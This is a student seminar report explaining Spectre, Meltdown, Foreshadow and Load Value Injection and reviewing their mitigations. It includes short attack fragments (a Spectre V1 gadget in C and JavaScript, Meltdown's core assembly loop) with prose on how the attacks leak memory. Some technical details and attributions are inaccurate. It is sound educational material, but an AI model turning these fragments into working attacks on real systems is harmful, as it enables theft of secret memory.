You are on page 1of 22

seminar report

Seminar: Embedded Systems in summer term 2020

Spectre & Meltdown


A tamed ghost?

Jonas Zeunert
Technische Universität Kaiserslautern, Department of Computer Science

Note: This report is a compilation of publications related to some topic as a result of a student seminar.
It does not claim to introduce original work and all sources should be properly cited.

Spectre and Meltdown are security attacks against the fundamental principles of out-of-order
and speculative execution of processors dating back until 1996.
Even though many people have heard about their impact their principles are often unknown
even though they are not that hard to understand with a bit of background knowledge.
Since a programmer is in responsibility of the security of his own code it should be a very
important topic for him to understand exactly at which points of his code it is attack-able
by Spectre vulnerabilities.
So in this seminar we will have a look in detail about the principles and techniques used by
Spectre and Meltdown attacks.

1 Introduction
In this seminar we will look at the security breaches Spectre and Meltdown. They are the first
practical example of hardware based side-channel attacks which were found in 2018 in parallel
by Google’s Project Zero and Kocher et al. [15] at the University of Graz. Spectre is as of today
still not fully mitigated since there are always new variants coming out while the mitigations
which solve the problem behind Meltdown sometimes are disabled because of performance im-
pacts.

These attacks totally shifted the general awareness of hardware based attacks since they are
more than easy exploitable via web-browsers and beforehand side-channel attacks were seen
as an attack vector for only breaking cryptographic systems in a academical view but not for
breaking arbitrary systems.
Their ability to bypass protection of virtual machines or sandboxes makes them extremely viable
in the view of the continuously growing cloud computing market and is therefore a big threat
to all of such systems.

We try to get an understanding on the history of the attacks, their impact, their function-
ality and their mitigations and try to answer the question if this new ghost that appeared in
the security realm was able to be finally tamed with the measures taken until today or if it is
something that will eventually haunt us a much longer time.

The rest of this paper is structured as follow: First we will get the necessary technical back-
ground in section 2. This covers the basics of side-channel attacks and speculative execution and
other things which are needed to understand the attacks. Then in section 3 we will talk about

1
the history and the evolution of the attacks. How the first side channel attacks were discovered
and how everything evolved to today’s stand and also try to classify the impact of this.
In the next section 4 we will actually take a look what the idea behind Spectre and Melt-
down is and how they work. Afterwards in section 5 we will discuss possible mitigations taken
both from software (5.1) and hardware (5.2) perspective. Finally in the last section 6 we will
discuss if it was possible to tame the ghost introduced with Spectre and Meltdown or if it was not.

2 Technical Background
Before describing how spectre and meltdown work in detail it is necessary to understand the
underlying techniques which are combined for the Spectre like attacks.

In this section we will take a look at the principles of caches, side channel attacks, out-of-order
execution and branch prediction.

2.1 CPU Cache


A CPU cache is a small sized but also very fast memory in a computer system located near
the execution unit of the CPU. Its main purpose is to cache often used data so the data does
not have to immediately be read from and written back to the main memory which is for Von-
Neuman machines the biggest bottleneck in computation .

Modern CPU’s typically have three levels of caches which are increasingly closer to the ALU
which makes accesses faster but also scratch the possible size. To get an example of modern
cache structures an AMD Ryzen 9 3900 [2] has 32KB level 1 cache and 512KB level 2 cache
for every single core. The level 3 cache is typically shared between all cores and has about 64MiB.

A cache is organized in lines and sets. A line contains multiple bytes of data while there are
multiple sets containing the lines. This is helpful to match any given main memory address to
a cache line and is important to understand for different side-channel attacks.

2.2 Side-channel attacks


Let us first get a definition for the term:

A side-channel attack is an attack enabled by leakage of information from a physical


cryptosystem by an unintended channel. Characteristics that could be exploited in
a side-channel attack include timing, power consumption, and electromagnetic and
acoustic emissions. [22]

So we see it is important for a side channel attack that some (here cryptographic) information
is getting leaked on a channel that was not intended to leak information. Often it is not even

2
intended to communicate any information like power consumption.

Standaert [25] goes further and subdivides side-channel attacks in both invasive or non-invasive
and active or passive. (Non-)Invasion describes the ability if the attack requires a direct access
to the physical chip or not and active and passive distinguishes if the attack changes the func-
tionality of the original algorithm or if it does not. To give an example of this different attacks
are classified in this scheme in figure 1

Invasive Non-Invasive
Active Induce signals on a device to get back Flipping bits via a technique like
information Rowhammer [13] to break page
separation
Passive Sensing the data on the DRAM bus Sensing electromagnetic signals emitted
by a machine

Figure 1: Examples for the side-channel classification as of Standaert (2010) [25]

Since this domain is really large we will concentrate in this paper on the non-invasive tech-
niques of cache based side-channel attacks which are the essential functionalities behind Spectre
and also Meltdown.

2.3 Cache based side-channel attacks


Cache based side-channel attacks can be classified with the scheme above as non-invasive pas-
sive attacks. Since they are only based on accessing the cache which does not require any direct
physical interaction they are non-invasive and even though they mess around with the cache
this does not directly impact any behaviour of any program and therefore are passive.

Most often they rely on the ability of the cache to decrease the time of memory accesses which
is as of today really slow in comparison to registers which are located near the execution units.
If a given data is already in the cache the execution of an algorithm is much faster than if it
was not in the cache. This timing offset allows to draw conclusions about the accessed address
and therefore about the actual data given the algorithm is known.

Even though in present time there are many known cache based side-channel attacks it is
sufficient to concentrate on the following three which are also used by Kocher et al. [15] in the
original spectre paper: Flush+Reload (2.3.1), Evict+Reload (2.3.2) and Prime+Probe (2.3.3).

2.3.1 Flush+Reload
Flush+Reload observed by Yarom et al. [29] is an attack which works with the clflush operation
of the x86 processor architecture which erases all cache lines in all three cache levels. It also relies
on the function of modern operating systems to share memory pages between processes and in its

3
more aggressive form of memory de-duplication where arbitrary similar looking pages are shared.

Basically Flush+Reload works in three phases:


1. Flush the cache line which is observed with clflush
2. Wait for the victim to access the cache line
3. Probe the cache timing of the memory line by reading from cache associated data which
is shared through page sharing
The most critically part on this is the wait time since if you either probe to early or to late
or even in the same time one could miss information. Also this only works if the memory pages
are shared so one can access the difference between the instantiation of a shared library.

2.3.2 Evict+Reload
Evict+Reload is a development from Flush+Reload made by Gruss et al. [11] It generalizes the
approach so that not only specific binaries can be attacked but instead one can read arbitrary
information from caches.
The attack is based on templates which are automatically generated by profiling the cache hit
ratio of a specific event like a keystroke which the attacker wants to catch. This generated tem-
plate is afterwards used to match the timings of other program instantiations and the attacker
is able to receive arbitrary data which he has profiled.

2.3.3 Prime+Probe
Prime+Probe first described by Osvik et al. [21] in 2006 as a first-level cache attack against AES
was further investigated by Liu et al. [18] in 2015 who shown that this attack can be practical
to read data on last level caches. As an example this can be useful to extract data between
virtual machines.
The idea behind Prime+Probe is that an attacker first primes the cache by filling every cache
line with its own data afterwards idles a bit so that he can probe at the end which cache lines
are replaced and with this can draw conclusions about which memory addresses are accessed.

With this information an attacker can as in the easily draw conclusions about the value in a
specific implementation of e.g. a specific GnuPG implementation or sometimes it is enough to
restore the whole secret.

2.4 Out-of-order execution


Out-of-order execution is another technique used for many years to speed up computation pro-
cess by computing code not strictly in order as it is programmed and compiled.
If some instructions does not have any dependencies in computation and one has got multi-
ple Arithmetic-Logic Units (ALU) at disposal it is possible to run these in parallel on micro-
architectional level.

4
But the most important thing about out-of-order execution is that it must be transparent to
the original intend of the code. So in the perspective of a programmer it should look like the
code is executed in order and there should be no hazards.

2.5 Branch prediction


One of the biggest speed impacts in today’s processor units was the invention of branch pre-
diction which is also called speculative execution. It increases the flow of data in multi-stage
pipelines by filling "holes" which arise due to conditional branches in code.

In more detail if there is a conditional branch typically the processor has to halt with its
execution until it knows the outcome of the branch to go further with instructions. This cre-
ates bubbles in the pipeline which hits performance since the computer can not do anything in
this cycles. Therefore the branch predictor of the CPU predicts with a given strategy (which
could be exemplary "always take the branch") the outcome and continues computing as if it is
predicted true. When the real result of the branch is arriving it either discards all calculations
if it was wrong or otherwise it saved a lot of cycles. This is especially important in case of loop
branches where a good prediction can make a big performance impact.

A loop which often happens to be in some code is the on seen in figure 2 1 written exemplary
in C. As one can easily see the loop condition will be true 100 times so predicting always true
would only lead to just a single false positive at the 101st time with the strategy always true
but else-wise the CPU could do the execution in parallel as much execution units it has at hand.

1 for(int i = 0; i < 100; i++) {


2 array[i] = i;
3 }
4

Figure 2: Example loop which can be accelerated by branch prediction.

Modern CPU’s got a dynamic branch predictor which trains itself with the already past
branches. So as an example if a given branch was taken the last ten times it is likely that it
will be also taken the eleventh time. But it is very important that any traces of this behaviour
are revoked if it predicts false like registers and stalled memory writebacks and caches. The last
does not happen and therefore enables Spectre and Meltdown like attacks.

2.6 Return-oriented programming


Return-oriented programming is a technique for exploiting buffer overflow vulnerabilities in
the presence of several security techniques like WX̂ or Address Space Layout Randomization
1
In real environments any compiler would speed up this loop by simply unrolling it which would then be speed
up by the out-of-order execution.

5
(ASLR).
In an unsecured environment the attacker would overflow the stack with the payload he wants
to be executed. Since several defense mechanisms prevent such attacks with return-oriented
programming the attacker tries to only override the function’s return addresses which is normally
pushed on the stack and tries to find gadgets in the code to jump to where he can either execute
arbitrary instructions or call a library function which loads his own code.
With this so called "gadgets" it is possible to execute arbitrary code.

3 History and Evolution


The first academically known side channel attack in modern times called "Tempest" reaches back
to 1943 where a researcher at the Bell Telephonic Laboratories discovered that the operation of
a cryptographic typewriter caused spikes on a nearby oscilloscope which could be translated to
the transmitted message. [6]

Afterwards the topic’s attention faded a bit away until Paul Kocher released it’s paper about
"Timing Attacks on Implementations of Diffie-Hellmann, RSA, DSS and Other Systems" in
1995 [16] which brought back attention to such types of attacks.
There were many speculations how these types of attacks could be practical in 2003 Tsunoo et
al. [26] showed how to successfully reduce the complexity of breaking the - until this day - state
of the art encryption standard Data Encryption Standard (DES) with cache attacks.

Then afterwards many different ways to use different side channels like electromagnetic radi-
ation, power consumption or microarchitectional chaches were found which finally lead to the
until now biggest part of this history with the release of Spectre and Meltdown which was found
at the same time by Kocher et al. [15] & Lipp et al. [17] and Yann Horn of Google Project Zero.

This finally opened Pandora’s box because afterwards many similar attacks were found and
continuously there are always new variants are released.
These include 8 different attacks called Spectre-NG which were first noted by the German com-
puter magazine C’t in May 2018 [12]. These are different attacks to exploit speculative execution
like spectre but have very different flaws like in one the attacker does not need to have control
over some memory of the attacked program or in the case of NetSpectre [24] which was released
in July 2018 does not even require an attack to run code on a remote machine after all but only
using common network functionalities.

In August 2018 then another big thing called Foreshadow (found in January 2018 by Van
Bulk et al. [27]) got released which even though similar to Spectre attacks the SGX enclave of
Intel processors which was until this point in time considered a totally secure code execution
platform for holding secrets which even the machines owner should not access.

Furthermore in 2020 Load Value Injection was discovered by Van Bulk et al. [28] which works
with the faults of Intel processors and the techniques of Spectre to receive data from arbitrary

6
load instructions.

Most recent in August 2020 the researchers behind the Foreshadow attack released a comment
that all mitigations against the Spectre attacks are made by false understanding about the
principles that lay behind them and until the fundamental problems are getting fixed there will
always be new Spectre-like attacks. [4]

3.1 Impact
As we have seen in the previous section the discovery of Spectre and Meltdown have brought the
topic of side channel attacks and speculative execution a lot of attention. It totally discarded
the assumption that was most common that the underlying hardware is executing correctly and
attacks against it are only of academical nature. Beforehand security researchers mostly focused
on finding bugs in software and exploiting them.

Figure 3: Evolution of spectre-alike security flaws as shown in "A Systematic Evaluation of


Transient Execution Attacks and Defenses" by Canella et al. [3]

The original spectre and meltdown papers led to a wide range of similar attacks as shown in
figure 3. This figure describes their systematic analysis of Spectre and Meltdown attacks. Since
so many varieties of them did appear after the initial release they tried a systematic approach
to find all possible combinations of the attacks. The ones highlighted in blue are the already ex-

7
isting and the ones in red are the ones which should be possible but have not been researched yet.

Since speculative execution is present in commercial CPU’s dating back to the 1990 and the
Meltdown vulnerability affects Intel processors starting from 2011, fixing their problems in hard-
ware will require to replace nearly every CPU which is in use today and one can easily imagine
how long something like this will take when we finally find a processor architecture which is not
vulnerable to Spectre attacks.

Beside the circumstance that it brought a totally new attack vector on computer systems into
the game their mitigations also had some kind of impact which get especially relevant in large
scale data centers. The performance hit highly depends on the hardware configuration as well
as the algorithms used since most patches change microcode of the processor. [14] So one can
not deviate a simple formula like patch = performance_impact% but it is possible to say that
the performance impact of the patches are somewhere between 1% and 20% which is less than
initially feared of about 40%-60% but it is still enough that most often it is pondered if it is
meaningful to fully mitigate the security breaches.

4 Functionality
Spectre as well as Meltdown2 work by exploiting some sort of out-of-order execution which
leaves unintended traces in processor caches. While Spectre is an attack against binaries by
finding specific usable gadgets, Meltdown is more a fault attack of the implementation of Intel
processors and some of ARM.

Both of them detect traces in the CPU’s cache left by out-of-order execution which exist be-
cause the executed operations in out-of-order execution are only reverted in memory, registers
and pipelines but not in caches since the cache is a separate unit of the CPU and does not get
informed that some operation was reverted. This creates a side channel which can be read out
by an attacker.

So in general these attacks can be split up in three main steps:

1. Bring the cache in a homogeneous state


2. Trick the CPU into speculatively executing something not intended
3. Read out the data left over in the cache through timing attacks

We will discuss this general approach in more detail by investigating the three main variants
of the security breaches: Spectre V1 (4.1.1), V2 (4.1.2, Meltdown (4.2), Foreshadow (4.3) which
is a development from Meltdown and Load Value Injection (4.4) which combines the approaches.
2
Which sometimes is also called Spectre V3 because of its similarities

8
4.1 Spectre
As already stated Spectre is an attack against a binary so in order to leak information one has
to analyze a program (most often a shared library) find specific instruction sequences. The main
thing is that these instructions somehow need to alter memory and therefore also the cache like
a x86 "move" instruction does.
Also there must be some kind of speculative execution involved which for Spectre V1 it is just
a conditional branch while for Spectre V2 there are only the return jumps of function calls are
used which also can trigger speculative execution and happens in almost every program.

Even though there are many more variants to Spectre which all in their own way exploit a
different behaviour of programs it should be necessary to understand the two released in the
first paper which even though not the sophisticated ones they give a good understanding what
went wrong.
The first variant called Spectre V1 exploits the conditional misprediction of branches. The
second variant (Spectre V2) exploits the poisoning of indirect branches. They both will be
discussed in the following sections.

4.1.1 Exploiting Conditional Branch Misprediction (Spectre V1)


Let us look into detail how a Spectre V1 exploitation works. For Spectre V1 the code flow must
have some branch involved to exploit speculative execution. In figure 4 we see such typical code
sequence for misuse of Spectre V1 attacks which he could find in a shared library, kernel code
or maybe in the implementation of a browser where he could execute some JavaScript.

In general such an attack includes the following steps:


At first an attacker would train the branch-predictor by calling the function multiple times
with an in-bound value of x. This leads to a situation where the CPU would assume that the
conditional branch is always true and assumes this also in the next call.
Afterwards it is necessary to somehow bring the cache in a homogenous state known to the
attacker either by calling the clflush instruction on x86 machines to erase it or by filling it with
known data to start a Flush+Reload or correspondingly a Prime+Probe attack after speculative
execution.
Then the attack begins and the function is called with a value for x out of bounds. Since we
trained the branch-predictor to assume the branch is true and flushed the cache so the bounds
of array1[x] are not known it speculatively executes the next line while waiting for the size of
array1 and loading array1[x] into the cache.
When the value of array1_size arrives everything gets reverted but the attacker can start prob-
ing array2. So he continuously checks the timings for reading of array2 from 0 to 256. Only a
single one of this accesses will be fast and this is logically the value of array1[x] which was not
known to the attacker beforehand.

Even though this attack requires comprehensive understanding of the attacked software it is
more than viable for widely used software like web-browsers, operating systems or safety-critical

9
1 if (x < array1_size)
2 y = array2[array1[x] * 256];
3

Figure 4: A typical Spectre V1 code flow where the attacker is in control of x

systems like encryption software.

To also show such an approach in figure 5 is an example implementation shown how Spectre
can even be exploited in a scripting language like JavaScript which can be used to bypass sand-
boxing of modern browsers.

1 if (index < simpleByteArray.length) {


2 index = simpleByteArray[index | 0];
3 index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
4 localJunk ^= probeTable[index|0]|0;
5 }
6

Figure 5: Implementation of a Spectre V1 attack in JavaScript.

In the example the constant TABLE1_STRIDE is 4096 and TABLE1_BYTES is 225 . So


first the branch predictor is trained by calling this code snippet about 1000 times with in-range
values but in the last call with a value out of bounds.
The variable localJunk is just there so that the JIT compiler of JavaScript does not optimize
out the operations and the "|0" is there to hint it that the resulting value is an integer.
With this the speculative execution is triggered and one has to read out the value afterwards
which is not that simple in JavaScript since there are no instructions like CLFLUSH which can
be called.
But the cache can also be evicted by reading out a series of addresses at a 4096-byte interval
out of a large array. Afterwards the secret value can be read out from the cache status of
probeTable[n*4096] with n in an interval of [0, 256].

4.1.2 Poisoning Indirect Branches

Poisoning Indirect Branches also known as Spectre V2 is a technique that is more general than
Exploiting Conditional Branches since it does not require an explicit indirect branch but uses
indirect branches that emerge from function returns.
More than often a jump to a function in program code is in dependence of a register or memory
address. So when the attacker is able to wipe out the cache before the return of the function
the CPU begins speculating about it and tries executing the value which is actually written in
the register of the indirect jump. Most often this is limited to the memory range of the victim
process but this can lead to situations where execution is taking directions which would never

10
occur in normal program flow.

1 class Base {
2 public:
3 virtual void Foo() = 0;
4 };

6 class Derived : public Base {


7 public:
8 void Foo() override { ... }
9 };

11 Base* obj = new Derived;


12 obj->Foo();
13

Figure 6: Example C++ code which leads to an indirect branch which could be exploited for
Spectre V2.

A C++ example which gives an idea when a indirect branch occurs is given in figure 6. When
overriding an abstract function in a base class and only having a pointer to the base class when
accessing it the system has to look up the address where the function lies in memory from the
virtual address table since it is not known at compile time. This resulting indirect branch can
be exploited by an attacker to read some arbitrary data from the program into the cache as long
as the CPU is waiting for the real address.

For the CPU to better predict such indirect branches its branch predictor utilizes the branch
history buffer which keeps track of indirect jumps. The attacker would train it beforehand by
filling it with erroneous branches and thus tricking it into making a jump to a gadget not in-
tended by the original program. From this load instructions are executed which somehow alter
the state of the cache.
This procedure is somehow similar to Return-Oriented programming described above and even
though the executed sequence is limited in its execution time it neither needs to terminate
cleanly since the CPU revokes the speculative execution nor does it leave traces because the
information attacked is received via side-channels.

The rest of the attack works similar to Spectre V1 by reading out the traces left in the cache
with cache based side-channel attacks.

4.2 Meltdown
Meltdown sometimes also called Spectre V3 found by Lipp et al. in 2018 [17] is an attack which
only works on all Intel processor dating back to 2011 and some ARM processors. It focuses on
reading kernel memory from an arbitrary user-space process by exploiting architectional faults

11
in these processors. The main flaw behind Meltdown is the assumption that when something is
executed out-of-order and gets discarded due to an exception everything gets reverted and there
are no further checks which protect the memory and arbitrary addresses can therefore be read.

1 raise_exception();
2 // the line below is never reached
3 access(probe_array[data * 4096]);
4

Figure 7: A pseudo code example of the mechanic of Meltdown.

We can analyze this behaviour by the simple pseudo code example in figure 7 which shows
what goes wrong in a CPU when a Meltdown attack is executed. In affected processors when an
exception occurs the next instruction could possibly be already executed nevertheless because
of out-of-order execution. Even though the results get reverted in memory and registers in the
cache this does not happen due to the fact that it is its own subsystem and an attacker could
read it through some cache based side channel attack such as Prime+Probe (2.3.3).
Meltdown bypasses all software and hardware defense features which are implemented until the
day of its release such as (Kernel-)Address-Space-Layout-Randomization ((K)ASLR) or CPU
based features like Supervisor Mode Access Prevention (SMAP) or No Execute (NX).

Figure 8: Physical memory is completely mapped with an offset in kernel-space as seen on the
blue address.

To see why arbitrary addresses can be read out in figure 8 it is shown that all real addresses
are mapped into kernel-space because the kernel typically has to perform actions on user mem-
ory pages.

To get into more detail when we read arbitrary memory that is not in our address range an
exception in the kernel gets triggered which handles the segmentation fault by terminating the
process which tries to read the protected memory. Therefore this behaviour must be handled
by the attacking process else wise it gets terminated. There are two different possibilities to

12
handle this:

The first trivial approach is to handle the exception by forking the attacking process just be-
fore the memory access. The forked process gets killed and the attacking process can thereafter
read out the memory. Since forking is a bit costly it would be better to just install a signal
handler handling this.

The other approach is to trick the processor into just speculatively executing the memory read
by branching it and train the branch predictor to take the branch. This leads to a situation
even though the exception is raised it gets un-winded when normal execution flow is going on.

Combining this Meltdown procedures as following:

1. An arbitrary memory address which is inaccessible to the attacker is read into a register
2. The value at the address is loaded into an probe array and the occurring exception is
handled
3. With Flush+Reload the content of the probe array is read out by the attacker
The above can be repeated with arbitrary memory so that in the end an attacker is able to
read out the whole physical memory of a system.

The attack usually translates to an assembler sequence shown in figure 9 which is the core
sequence of meltdown attacks.

1 ; rcx = kernel address


2 ; rbx = probe array
3 retry:
4 mov al, byte [rcx]
5 shl rax, 0xc
6 jz retry
7 mov rbx, qword [rbx + rax]
8

Figure 9: Core instruction sequence of Meltdown.

In register RCX is the kernel address which should be read out and in RBX is the probe
array which constructs the side channel. In line 4 the leased significant byte of RCX gets loaded
into AL (which represents the least significant byte of RAX). Afterwards the pipeline is tried
to utilized as much as possible by the left-shift and retry. This ensures that the execution gets
delayed as much as possible. This leads to an exception but there is a race condition between
the raising of the exception and the transmission of the secret in line 7.
In line 7 the the value of the read address gets multiplied by the page size. With a page size
of 4KB our probe array is 256x4096 bytes for reading a single byte. This ensures that the

13
pre-fetching of memory does not load neighboring addresses and creating noise when reading
out the value. Afterwards it gets moved to our probe array RBX.

On micro-architectional level the instruction in line 7 races against the exception and even
though everything gets reverted afterwards there is a high possibility that the write to RBX is
faster.
Now the attacker just has to probe the timings of the RBX array which values are cached and
gets the value of the read kernel address.

Since every physical address is somehow mapped to kernel memory the above steps just have
to be repeated for every possible address and it is possible to read out the whole memory at a
bandwidth of about 3.2KB/s up to 503KB/s.

4.3 Foreshadow
Foreshadow discovered by Van Bulk et al. [27] is like Meltdown an attack only viable on Intel
CPU’s and especially targeting the secure enclave SGX which is a feature to protect the exe-
cution of user software. It allows an attacker not only to read out the whole memory of the
enclave (which should not be possible) but also to steal the private key and with this completely
breaking it.

The attack works similar to Meltdown and is according to Intel a "L1 Terminal fault". The
problem of accessing memory of the SGX lies in the fact that even though when a unprivileged
access to the memory is made it does not raise an exception like Meltdown but instead the value
in the cache is replaced by a dummy value. Therefore the race condition between exception and
memory read of Meltdown can not be utilized.
To counter this they revoke all access to the page table they want to read out by a call to the
instruction "mprotect". This clears the present bit of the page table and an exception is thrown.
Now the real value lies in the cache and can be read out by a side channel like Flush+Reload
as it is also in the Meltdown attack.

4.4 Load Value Injection


Load Value Injection researched by Van Bulck et al. [28] most recent in 2020 is a technique which
apply Spectre-like code gadgets with Meltdown data leakage. The attack only proceeds within
the victim’s address space and with this bypass most of the mitigations against Meltdown like
KAISER which will be explained in section 5.1.1.

The general approach can be seen in figure 10. An illegal value controlled by an attacker is
loaded into a micro-architectional buffer which prepares the attack. This results that the value
of B is tried to accessed by the victim but the value of A is illegaly served from the buffer. The
CPU now executes the instructions depending of the gadget which lies at A.

14
Figure 10: The general approach of LVI as shown in LVI: Hijacking Transient Execution through
Microarchitectural Load Value Injection [28]

A toy example what kind of code structure is needed can be seen in figure 11 where first in
line 2 a value of the attacker gets loaded and afterwards a page fault occurs when dereferencing
the double pointer which leads to the execution of the attacker’s value.

1 void call_victim(size_t untrusted_arg) {


2 *arg_copy = untrusted_arg;
3 array[**trusted_ptr * 4096];
4 }
5

Figure 11: Example of LVI attackable code.

The authors state that every load instruction can be turned into a LVI attack and a de-
fense against this attack requires an orthogonal approach which combine defenses against either
Spectre and Meltdown.

5 Mitigations
There are several mitigation which were done and applied to operating systems, compilers and
software directly after the release of the security breaches because of the responsible disclosure
time. Some of them early on caused big trouble and had to be reverted and revised like the
first Meltdown patch on Microsoft Windows 7 which enabled an attacker to even write arbi-
trary memory regions. [7] They protect against the most critical parts of the attacks which
are described in the papers but are claimed multiple times to not solve the underlying issues
of Spectre and Meltdown which can only be fixed in hardware which did not happen until today.

In general one can classify the mitigations into three kinds: [23]

15
1. Reducing the accuracy of covert channel communication to eliminating it or making gad-
gets unavailable which for example was done by Web-Browser manufacturers (5.1.4)
2. Aborting or preventing transient execution when accessing secrets (as an example here we
can take retpoline 5.1.3)
3. Ensuring that secret data is unavailable which is what the KAISER 5.1.1 patch does

In this chapter we will discuss the software patches named Kaiser (5.1.1) and retpoline (5.1.3)
which help protect software against data leakage and also discuss a complete in-hardware ap-
proach to fix the issues finally.

5.1 Software Mitigations


5.1.1 KAISER
KAISER developed by Gruss et al. [10] is a operating system patch mitigating only the Melt-
down security breach by removing the mapping of user memory into kernel-space. This strictly
separates user-space from kernel-space and therefore it is no longer possible to leak data through
Meltdown.

It is a development from KASLR which hardens exploitation of bugs by randomizing kernel


memory layout and is also recommended to be implemented in all operating system kernels by
the authors of the Meltdown paper.

There are several challenges to overcome when isolating the memory ranges from user-space
and kernel-space.
The first problem are threads which are highly used in modern parallelized programming be-
cause if the memory page structure of threads is modified upon a context switch this affects all
other threads which are running for the same program.
Furthermore there are several memory regions which must be shared between kernel and user-
space and especially unmapping user-space and kernel-space would require rewriting of most
parts of actual kernels.

The last challenge is more a performance one because switching the address space requires
the Translation Lookalike Buffer’s (TLB) cache which manages the mapping of virtual to real
memory addresses to be flushed which is a quite expensive operation and is nowadays optimized
to happen as few as possible.

KAISER is a patch which accomplishes these challenges by multiple different approaches while
reducing the overhead to a performance impact of only 0.28%.

To overcome the first problem they introduce shadow address spaces which maintains the par-
allel kernel and user-space mapping by giving every process two separate address spaces which
are replaced as needed on context switch by updating the corresponding register CR3.
The second problem is solved by KAISER by only keeping the most necessary memory regions

16
of kernel-space mapped into user-space and vice versa. These include the Interrupt Request
Table, the Global Descriptor Table, the Task State Segment and finally the thread stacks. Even
though kernel-space is nearly entirely removed from kernel-space the same does not apply the
same to user-space in kernel. They found this impractical since most operating systems rely on
this system and followed the approach to make user-space memory non-executable in kernel-
space.
Furthermore they have disabled the global bits of kernel pages in the TLB which according
to them makes no performance impact and is together with shadow address spaces a complete
protection against leaking memory from kernel-space. The switches happening for the shadow
address spaces does not require to flush the TLB cache and with this the performance impact
is minimized.

Because of its good performance impact and complete protection against Meltdown 3 which
does not require to recompile any software. As of today this patch is applied to most modern
operating systems.

5.1.2 LFENCE
LFENCE is a x86 instruction which blocks further execution until all operands are loaded. This
ensures that the program code is serialized but since speculative execution is a hardware feature
it can not prevent it from happening.

So it would only prevent Spectre V1 on conditional branches but not Spectre V2 with branch
poisoning. Also it has several drawbacks:
The first is that this really slows down execution and with this can only be used at really critical
instructions. And with this it is in hand of the programmer who has to have a good understand-
ing of speculative execution and has to carefully decide where to use this and it is more than
likely that it is overseen in certain circumstances.

So even though it is a good start for a mitigation it does not fix the problem.

5.1.3 Retpoline
Retpoline is a technique developed by Google [9] against poisoning indirect branches with the
main idea that even though one can not hinder the CPU to speculatively execute one can
trick it into the developer’s own speculative execution. The name composes from ret(urn) and
trampoline which also describes the idea behind this to trap the function return in an infinite
speculation until the required data arrived.

Since every call to a function is an indirect branch the idea behind retpoline is to trap the
branch predictor of the CPU into just speculatively always the same code until the return ad-
dress is computed.

3
But not its successors like LVI as already stated

17
1 call set_up_target; (1)
2 capture_spec: (4)
3 pause;
4 jmp capture_spec;
5 set_up_target:
6 mov %r11, (%rsp); (2)
7 ret; (3)
8

Figure 12: Example x86 assembler which shows the implementation of retpoline

The implementation of retpoline can be seen in figure 12. The call to set_up_target (1)
will push the address which corresponds to line 2 in the ample onto the stack to return to.
set_up_target now changes the return address with a memory access (2). Since the CPU has
to wait for the result of this access to arrive at (3) it speculatively returns to the address on
the stack and there the retpoline technique comes on. The speculative execution is captured in
this loop and when finally the address arrives after a few 100 circles this is discarded without
accessing any information.

Since naturally the CPU has to wait for the memory address to jump to arrive retpoline has
no performance impact. It just disables the builtin jump to already known prediction but this
can be circumvented by manually giving this information at compile time for known indirect
branches.

5.1.4 Timer Inaccuracy in JavaScript


Another viable approach to make Side-Channel attacks impossible is to artificially reduce the
accuracy of timers. Such approaches do not apply for every program but especially in sandboxed
environments like browsers this was a measurement to be taken by all well-known browser
manufacturers like Mozilla [20], Google [8] and Microsoft [19].
All of them made their high precision timers in their browsers inaccurate so that even though
the security hole is still applicable and one can trick the CPU in wrong speculative execution it
is no longer possible to read out data between different tabs at a cost that is negligible for most
JavaScript used at websites.

5.2 Hardware Mitigations


Since hardware mitigations require a long time to be tested and shipped until they can be ap-
plied most patches until today where taken either in software or microcode of processors. Also
the development departments of well-known processor manufacturers did announce that several
tweaks to their architectures where made to somehow mitigate the issues but this is most often
not public.

After all in 2020 Schwarz et al. [23] developed a hardware/software mixed approach called

18
ConTExT that requires only little tweaks in hardware but also some new concepts in program-
ming but trying to mitigate the issue in general.

5.2.1 ConTExT
As already stated ConTExT (Considerate T ransient Execution T echnique) is a general ap-
proach to mitigate the whole spectre family by moving the responsibility up to the highest level
of software development the actual code. Also it introduces a new non-transient bit which needs
to be set for page tables and registers which indicates the CPU that it should use a dummy
value instead of the actual if making a transient execution.
This not only ensures that memory locations are protected against speculative attacks but also
registers. After all ConTExT is an over all approach which affects every part of a computer
system from processors which keeps track of the secrets to operating systems which is aware of
secrets in registers when context switches, compilers who adapt the new secret annotation to
machine instructions and the actual code which needs a new annotation for secret values.

It makes the assumption that in general it is distinguishable if a value is secret or not. This
assumption has to be made by the programmer and for ConTExT he needs to annotate these
values that they are secret. With this information the compiler can make an additional section
in the resulting binary where secret values are stored. This section is hold by memory pages
which have the non-transient execution bit set and every value in it is kept track by the hardware
when in use by also storing this bit in the registers of the CPU. When such a value is needed
in an execution and the CPU tries to predict it it first checks for the bit and when it is set it
disables the speculative execution.

In the end the authors claim that this approach has a performance impact of 0% up to 338%
while fully mitigating all known Spectre attacks and can even be easily adapted to every new
variant that ever comes out.

6 Conclusion
With all this knowledge it is not hard to say that neither Spectre nor Meltdown are really a
tamed ghost. Even though every actor in the game is actively trying to fix the urgent problems
there is - until today - not really a general approach commonly adapted in processors to fix
the problems of out-of-order and speculative execution. A real fix for the problems can only be
with a total redesign of the processor architecture as seen in section 5.2 and this requires all
hardware to be exchanged which will take centuries until it is completed. Until this point the
only viable alternative is to proactively reacting to new variants and try to fix them in software
as much as possible. After all this problem will bother us yet for a long time.

Furthermore have these attacks made side-channel attacks in particular but also hardware
attacks in general a really popular scientific field and it is to be expected that these will make
a much bigger impact in the future for attackers if they get more widely adopted and more

19
researchers are concentrating on this topic.

All discussions about mitigations for the attacks have always a big focus on performance
which is in an economical sense understandable since the performance impact of speculative and
out-of-order execution is too big to neglect.
But since we are at a point where actual processor architectures can not keep up with Moore’s
law and making the structures always smaller is coming to an end it is necessary to switch to
new approaches for the architectures to improve performance further so it would be a good pos-
sibility to take this chance for the future and develop new architectures which are not affected
by Spectre nor Meltdown.

For the future it will be much more important that hardware engineers not only focus on
performance at all cost but they have to shift their attention more to the security aspects of
processors to ensure that the data of a user is protected even in hostile environments where
multiple users share a single physical machine like virtual machines and cloud computing.

20
References
[1] CLFLUSH Documentation. Available at https://www.felixcloutier.com/x86/clflush.
[2] AMD: AMD Ryzen Specification. Available at http://www.cpu-world.com/CPUs/Zen/AMD-Ryzen%
209%203900.html.
[3] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner,
Frank Piessens, Dmitry Evtyushkin & Daniel Gruss: A Systematic Evaluation of Transient Execution
Attacks and Defenses.
[4] Thomas Claburn: Foreshadow returns to the foreground: Secrets-spilling speculative-execution In-
